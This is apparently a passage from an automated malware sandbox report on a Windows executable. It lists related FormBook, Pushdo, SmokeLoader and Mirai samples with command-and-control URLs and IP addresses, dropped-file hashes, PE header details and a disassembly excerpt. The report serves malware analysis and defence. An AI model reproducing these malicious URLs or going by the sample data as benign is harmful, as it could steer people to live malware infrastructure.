                                                                                                                                                                                                                                                              EXFZCd3tg9.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • www.dddiary.com/nj3r/?dN64XRU=eSMq/C3zDSW4Jo81vuP5ZU+9Q9DV/cVNxzH2l+7wLvxBeILQdkpAqMF5V8/HLdhLS/tMPz3PDWhnQaLrvAdStxjEP6P+jZRGfA==&4hxdyt=1bh8g
                                                                                                                                                                                                                                                              nAMQggsILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.bloonmberg.com/0mcc/?_2Mta=-ZVX&9rK=gIiCmOcfAWtrPT0g3SRHuLFCf2RfqeBdwwtXIVnNKrXayJIHmfV7SS09JWW1YjfL/DT5cxkVi+NYShQuYOeL97Pb69a+6rFnkQ==
                                                                                                                                                                                                                                                              bviYfrch3V.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.carparts77.info/zzun/?nDK=nbNLEBC0E0&8p=pjSA+y3GPrboq7vFdEhenT2kNtiCunEhXGq1wXPdloP3psmNhwIKyHW7aJG50JfDZgbB
                                                                                                                                                                                                                                                              BANK SLIP_WOOHYUN GREEN_HOCHIMINH_EPDA_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.katescakesandcreations.com/a2es/?mHIpoV=ARLKp665GTw8UZDxB6R+hmSSvFKE03yPatJrFkpifyqVvX4LZBQEoBDnBtvB/KAhmUfy&8ptdY=7n9xUHkX8LQx_
                                                                                                                                                                                                                                                              Non-Disclosure Secrecy Agreement-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • www.noceducacao.com/u808/?ZJE=qsGJ9h+hw7+6tN26aggUAOEBH60lU4QC0s4/MG5BKIGTShTMYW23d561RCW4qTvBIzuW&bBCl7=4hQPRR4hVDfl2
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              impexnc.comnhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              fs7AQcREFX.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              MYorfmVq9Z.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              lCVLEXbxih.exeGet hashmaliciousPushdo, DCRat, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              SU2xrRCA3S.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              icKRjsDL47.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                              • 204.11.56.48
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              DEVINOTELECOM-ASRUQGIoBedyjP.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                              • 195.208.182.205
                                                                                                                                                                                                                                                              gHzlB276nh.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                              • 195.208.182.217
                                                                                                                                                                                                                                                              oCuJSvJN7o.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                              • 195.208.182.234
                                                                                                                                                                                                                                                              ISd7zpfQxZ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                              • 195.208.182.205
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                                                                              • 185.205.70.129
                                                                                                                                                                                                                                                              1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 185.205.70.128
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 185.205.70.128
                                                                                                                                                                                                                                                              h9Gwq0fYVO.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              • 185.205.70.128
                                                                                                                                                                                                                                                              0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 185.205.70.128
                                                                                                                                                                                                                                                              TLURH6Og6c.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • 185.205.70.128
                                                                                                                                                                                                                                                              6PsrnXe0XiGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                              • 195.208.182.232
                                                                                                                                                                                                                                                              b0Ht6p5D1JGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 195.208.182.229
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19Invitation_Farewell_DE_EMB.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              Invitation_Farewell_DE_EMB.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              Dagplejers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              temperaturtagningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              mJPsYZv379.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              IE_Networks.htaGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              IBM_Linixe.bin.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              Remittance_copy.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              Invoices.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              Payment_Document.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              pikabot_core.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              pikabot_core.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              SecuriteInfo.com.Trojan.Heur2.sNW@If4VDppi.27877.25664.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              SecuriteInfo.com.Adware.Zaxar.111.16621.29357.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              1.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              kMyL3tnxhT.exeGet hashmaliciousSmokeLoader, VidarBrowse
                                                                                                                                                                                                                                                              • 172.67.156.49
                                                                                                                                                                                                                                                              • 49.212.235.175
                                                                                                                                                                                                                                                              • 188.114.97.7
                                                                                                                                                                                                                                                              • 188.114.96.7
                                                                                                                                                                                                                                                              • 83.223.113.46
                                                                                                                                                                                                                                                              • 91.229.22.126
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              C:\Users\user\pigalicapi.exefile.exeGet hashmaliciousAmadey, Djvu, Fabookie, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Djvu, Fabookie, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):46
                                                                                                                                                                                                                                                                    Entropy (8bit):1.0424600748477153
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:/lbq:4
                                                                                                                                                                                                                                                                    MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                                                                                                                                                                                                                    SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                                                                                                                                                                                                                    SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                                                                                                                                                                                                                    SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:........................................user.
                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                    Size (bytes):1446
                                                                                                                                                                                                                                                                    Entropy (8bit):7.4129298094651395
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:EtPRDylU2TFxupqIAxy4rvmv/HCsCgBqDErvuq72Jk+/k6:EtP5ylUcMwI54rvs/HCsCsyE77T6
                                                                                                                                                                                                                                                                    MD5:61A78F618BBE4837629573F7D3A4064D
                                                                                                                                                                                                                                                                    SHA1:B5A14568808F3379C6987DF736653B57B026C329
                                                                                                                                                                                                                                                                    SHA-256:5ABB61CE38B4503DAFD31AE33B2D7B776C9F2C71B8071C999C9691E5643BD4CF
                                                                                                                                                                                                                                                                    SHA-512:2167F25C48BDB7C1EBF27E183A8E80DB497E356EC6D8181669D16EE3A76FD8127414FD20141DB300B5AA5F1DF1762407F667D4148569759914AFD48DF73BC1EC
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O......yR.$..D............,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....g.....j.+....8.w.=MT..C.....f............. ...PG........h...'d5.1................K...x.P%.2....r.k.D...X&..m...>..j....!zF..N$..Zp..........v.>..7....;..O...Y.|...o.>..~".j..#R..(O:..].D..d..7i.@...(.}Ep..........."Qd:.yZf..zyc..N$BW..C..?l..].Jy....+.l..6|.a..~..........e....9.1&^.....=?q..-.+..3afnBVA..'L.e...Tg>.'.U.[.i......../>YX..)j.{.Ql.(..m..3xs......i.s.8=.....q..7...........x..B.j[.0xL../........4.......^.'..la....U+.5.....&...Pk..=te..to.....e.y..+.V...Ko...\Mi.:.,...V{...C>..8U..c...*Zr.3j.q...}...V.).....c.a2=.<.x....n2...........}.d../a.c.r...~f..XS..>...\K.^&.z.\.p_.X..5....+..._).4yUlN*/...$h0W.LvL.N.9'}|.....le..wd
                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):647680
                                                                                                                                                                                                                                                                    Entropy (8bit):7.024033720862588
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12288:fxpO6rJYR9z8fcKObTrge4calxG7G/R2dmyplrx3r3j1+:fxU6dYT8fKPUaa7GK/WlJro
                                                                                                                                                                                                                                                                    MD5:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                                    SHA1:8D7E388B5D276816279EF37E7CAB9CD554251737
                                                                                                                                                                                                                                                                    SHA-256:DB47DF7CF51747E533C968DA7452F1CE6D20F465D7FCD6E2EAC559266AC3E9ED
                                                                                                                                                                                                                                                                    SHA-512:B3DADF871AABA70FAFB20E6AF4601013B225EB27565E6CEA73A739F90993E84F581B0A719AE61019E082B25EF0CDC4C573CBA2BD669C2A7310D8FAE5A6A87B04
                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V..W...V..W...V..W...V..UV...V..WV..V..VV...V}toV...V...V...V..W...V..[V...V..W...VRich...V........PE..L....6.d.....................j......U.............@..........................0............@....................................(...............................P......................................@...............4............................text...+........................... ..`.rdata...!......."..................@..@.data...X*....... ..................@....gfids..............................@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                    Entropy (8bit):7.024033720862588
                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                    File name:PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    File size:647'680 bytes
                                                                                                                                                                                                                                                                    MD5:ca67c9c17a701b0664b90de372acdfb1
                                                                                                                                                                                                                                                                    SHA1:8d7e388b5d276816279ef37e7cab9cd554251737
                                                                                                                                                                                                                                                                    SHA256:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed
                                                                                                                                                                                                                                                                    SHA512:b3dadf871aaba70fafb20e6af4601013b225eb27565e6cea73a739f90993e84f581b0a719ae61019e082b25ef0cdc4c573cba2bd669c2a7310d8fae5a6a87b04
                                                                                                                                                                                                                                                                    SSDEEP:12288:fxpO6rJYR9z8fcKObTrge4calxG7G/R2dmyplrx3r3j1+:fxU6dYT8fKPUaa7GK/WlJro
                                                                                                                                                                                                                                                                    TLSH:9CD4E000F452FC31E9A3353F5861D55BD92C6D2C4B21CB9B3248CB3BBE52190AFA656B
                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V...W...V...W...V...W...V..UV...V..WV...V..VV...V}toV...V...V...V...W...V..[V...V...W...VRich...V........PE..L..
                                                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                    Entrypoint:0x40dc55
                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                                    Time Stamp:0x64C2368C [Thu Jul 27 09:19:08 2023 UTC]
                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                    Import Hash:70358da30a737c94107b030bef3e8be7
                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                    call 00007F8050C3D63Dh
                                                                                                                                                                                                                                                                    jmp 00007F8050C3CBC3h
                                                                                                                                                                                                                                                                    cmp ecx, dword ptr [0049DD74h]
                                                                                                                                                                                                                                                                    jne 00007F8050C3CD35h
                                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                                    jmp 00007F8050C3D089h
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                    or ecx, eax
                                                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                    jne 00007F8050C3CD3Bh
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                    mul ecx
                                                                                                                                                                                                                                                                    retn 0010h
                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                    mul ecx
                                                                                                                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                    mul dword ptr [esp+14h]
                                                                                                                                                                                                                                                                    add ebx, eax
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                    mul ecx
                                                                                                                                                                                                                                                                    add edx, ebx
                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                    retn 0010h
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    cmp cl, 00000040h
                                                                                                                                                                                                                                                                    jnc 00007F8050C3CD47h
                                                                                                                                                                                                                                                                    cmp cl, 00000020h
                                                                                                                                                                                                                                                                    jnc 00007F8050C3CD38h
                                                                                                                                                                                                                                                                    shld edx, eax, cl
                                                                                                                                                                                                                                                                    shl eax, cl
                                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                                    mov edx, eax
                                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                                    and cl, 0000001Fh
                                                                                                                                                                                                                                                                    shl edx, cl
                                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                                    xor edx, edx
                                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                    or eax, eax
                                                                                                                                                                                                                                                                    jne 00007F8050C3CD5Ah
                                                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                    xor edx, edx
                                                                                                                                                                                                                                                                    div ecx
                                                                                                                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                    div ecx
                                                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                                                    mov eax, ebx
                                                                                                                                                                                                                                                                    mul dword ptr [esp+10h]
                                                                                                                                                                                                                                                                    mov ecx, eax
                                                                                                                                                                                                                                                                    mov eax, esi
                                                                                                                                                                                                                                                                    mul dword ptr [esp+10h]
                                                                                                                                                                                                                                                                    add edx, ecx
                                                                                                                                                                                                                                                                    jmp 00007F8050C3CD79h
                                                                                                                                                                                                                                                                    mov ecx, eax
                                                                                                                                                                                                                                                                    mov ebx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                    mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                    shr ecx, 1
